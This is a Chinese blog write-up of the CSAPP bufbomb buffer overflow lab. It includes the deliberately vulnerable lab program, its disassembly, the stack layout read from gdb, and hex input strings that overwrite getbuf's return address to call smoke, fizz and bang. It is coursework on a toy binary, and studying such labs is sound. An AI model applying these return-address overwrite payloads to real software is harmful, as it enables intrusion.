csapp (《深入理解計(jì)算機(jī)系統(tǒng)》）一書中有一個(gè)關(guān)于緩沖區(qū)溢出的實(shí)驗(yàn)，其程序代碼如下：

/* Bomb program that is solved using a buffer overflow attack */#include <stdio.h> #include <stdlib.h> #include <ctype.h> #include <signal.h> #include <unistd.h>/* Signal handler to catch bus errors */ void bushandler(int sig) {printf("Crash!: You caused a bus error!\n");printf("Better luck next time\n");exit(0); }/* Signal handler to catch segmentation violations */ void seghandler(int sig) {printf("Ouch!: You caused a segmentation fault!\n");printf("Better luck next time\n");exit(0); }/* Alarm handler to catch infinite loops */ static int alarm_time = 600;void alarmhandler(int sig) {printf("Dead!: getbuf didn't complete within %d seconds\n", alarm_time);printf("Better luck next time\n");exit(0); }/* Illegal instruction handler */ void illegalhandler(int sig) {printf("Oops!: You executed an illegal instruction\n");printf("Better luck next time\n");exit(0); }/* Like gets, except that characters are typed as pairs of hex digits.Nondigit characters are ignored. Stops when encounters newline */ char *getxs(char *dest) {int c;int even = 1; /* Have read even number of digits */int otherd = 0; /* Other hex digit of pair */char *sp = dest;while ((c = getchar()) != EOF && c != '\n') {if (isxdigit(c)) {int val;if ('0' <= c && c <= '9')val = c - '0';else if ('A' <= c && c <= 'F')val = c - 'A' + 10;elseval = c - 'a' + 10;if (even) {otherd = val;even = 0;} else {*sp++ = otherd * 16 + val;even = 1;}}}*sp++ = '\0';return dest; }int getbuf() {char buf[16];getxs(buf);return 1; }void test() {int val;printf("Type Hex String: ");val = getbuf();printf("getbuf returned 0x%x\n", val); }void smoke() {printf("Smoke: You called smoke()\n");exit(0); }void fizz(int val) {if (val == 0xdeadbeef) {printf("Fizz!: You called fizz (0x%x)\n", val);}else {printf("Misfire: You called fizz (0x%x)\n", val);}exit(0); }int global_value = 0;void bang() {if (global_value == 0xdeadbeef) {printf("Bang!: You set global_value to 0x%x\n", global_value);}else {printf("Misfire: global_value = 0x%x\n", global_value);}exit(0); }int main() {int buf[16];/* This little hack is an attempt to get the stack to be in astable position*/int offset = (((int) buf) & 0xFFFF);int *space = (int *) alloca(offset);*space = 0; /* So that don't get complaint of unused variable */signal(SIGSEGV, seghandler);signal(SIGBUS, bushandler);signal(SIGALRM, alarmhandler);signal(SIGILL, illegalhandler);/* Set up time out condition */alarm(alarm_time);test();return 0; }

?要求程序輸出 Smoke!: You called smoke()

?

?

我所使用的系統(tǒng)環(huán)境（archlinux 2010.05, gcc 4.5.2, gdb 7.2, objdump(bintuils) 2.21):

該問題中關(guān)鍵的兩個(gè)函數(shù)是test和getbuf，需要了解執(zhí)行這兩個(gè)函數(shù)的棧幀布局。

?

先運(yùn)行

gcc -o bufbomb -g -Wall bufbomb.c
objdump -d bufbomb > bufbomb.s
這兩條命令得到bufbomb.s,該文件中test和getbuf對(duì)應(yīng)內(nèi)容如下：

080486a6 <getbuf>:80486a6: 55 push %ebp80486a7: 89 e5 mov %esp,%ebp80486a9: 83 ec 28 sub $0x28,%esp80486ac: 8d 45 e8 lea -0x18(%ebp),%eax80486af: 89 04 24 mov %eax,(%esp)80486b2: e8 20 ff ff ff call 80485d7 <getxs>80486b7: b8 01 00 00 00 mov $0x1,%eax80486bc: c9 leave 80486bd: c3 ret 080486be <test>:80486be: 55 push %ebp80486bf: 89 e5 mov %esp,%ebp80486c1: 83 ec 28 sub $0x28,%esp80486c4: b8 ef 89 04 08 mov $0x80489ef,%eax80486c9: 89 04 24 mov %eax,(%esp)80486cc: e8 63 fd ff ff call 8048434 <printf@plt>80486d1: e8 d0 ff ff ff call 80486a6 <getbuf>80486d6: 89 45 f4 mov %eax,-0xc(%ebp)80486d9: b8 01 8a 04 08 mov $0x8048a01,%eax80486de: 8b 55 f4 mov -0xc(%ebp),%edx80486e1: 89 54 24 04 mov %edx,0x4(%esp)80486e5: 89 04 24 mov %eax,(%esp)80486e8: e8 47 fd ff ff call 8048434 <printf@plt>80486ed: c9 leave 80486ee: c3 ret

?最左側(cè)部分是匯編指令的內(nèi)存地址，其中與??? printf("getbuf returned 0x%x\n", val); 這一句對(duì)應(yīng)的匯編語句為：

80486e1: 89 54 24 04 mov %edx,0x4(%esp)80486e5: 89 04 24 mov %eax,(%esp)80486e8: e8 47 fd ff ff call 8048434 <printf@plt>

其中的printf指令地址為0x080486e8，由于intel處理器采用小端法表示，所以實(shí)際表示為e8860408

?

執(zhí)行g(shù)db bufbomb命令，在getbuf函數(shù)設(shè)置斷點(diǎn)（用break getbuf)

執(zhí)行run命令，程序跳轉(zhuǎn)至getbuff，然后用info reg查看寄存器內(nèi)容，得到ebp值為0xbffeffb8???

?

根據(jù)上面的反匯編結(jié)果可以知道，調(diào)用getbuf函數(shù)時(shí)的棧幀（假設(shè)是地址從高向低排列）表示如下：

?

---------------

?

-----------------

?

---------------

getbuf 返回地址

----------------

ebp

------------------

暫為空

-----------------

暫為空

----------------

buf[12]-buf[15]

----------------

buf[8]-buf[11]

----------------

buf[4]-buf[7]

----------------

buf[0]-buf[3]

-----------------

?

在從getbuf返回后，我們要求輸出smoke函數(shù)內(nèi)容，即將smoke的返回地址（0x080486ef，即ef860408)壓入到getbuf所在地址處。因?yàn)閟moke函數(shù)沒有函數(shù)參數(shù)，所以不需要多余的處理.

接著運(yùn)行bufbomb程序，提示輸入字符串，我輸入的字符串為：00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ff fe bf ef 86 04 08

輸出結(jié)果為：Smoke: You called smoke()

其中前面24個(gè)字節(jié)為空（其實(shí)這些內(nèi)容可以為任意值），接下來是ebp地址，它需要保持原來的內(nèi)容。再然后是smoke函數(shù)的返回地址。

?

現(xiàn)在還沒有完全完成所有的實(shí)驗(yàn)，還可以將返回地址設(shè)為fizz或者bang函數(shù)，然后也可以得到不同的輸出結(jié)果。

例如，如果輸入字符串為：00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ff fe bf 0d 87 04 08 ，此時(shí)得到輸出結(jié)果為：Misfire: You called fizz (0xb773bff4)

如果輸入字符串為：00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ff fe bf 0d 87 04 08 ef be ad de ef be ad de
可以得到輸出結(jié)果為：Fizz!: You called fizz (0xdeadbeef)

這個(gè)例子中使用了fizz的返回地址（0x0804870d，可以在上面的反匯編代碼中找到fizz標(biāo)記左側(cè)的地址即是，還有fizz的形參的內(nèi)容不做修改和修改為0xefbeadde時(shí) 的情況）

?

如果輸入字符串為：00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ff fe bf 52 87 04 08 ，得到輸出結(jié)果為Misfire: global_value = 0x0
如果輸入字符串為00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ff fe bf 64 87 04 08 ，得到輸出結(jié)果為Bang!: You set global_value to 0x0
這個(gè)例子是直接跳轉(zhuǎn)到bang的返回地址（0x08048752）或者printf（“Bang!: You set global_value to 0x0"）語句對(duì)應(yīng)匯編語句的首地址（0x08048764）

?

參考鏈接：

bufbomb lab assignment

緩沖區(qū)溢出攻擊實(shí)驗(yàn)

ubuntu 9.10 緩沖區(qū)溢出實(shí)驗(yàn)

insecure programming

linux緩沖區(qū)溢出原理與對(duì)策

緩沖溢出分析

非安全編程演示之高級(jí)篇

buffer overflow on wikipedia

?

總結(jié)

以上是生活随笔為你收集整理的csapp bufbomb实验的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。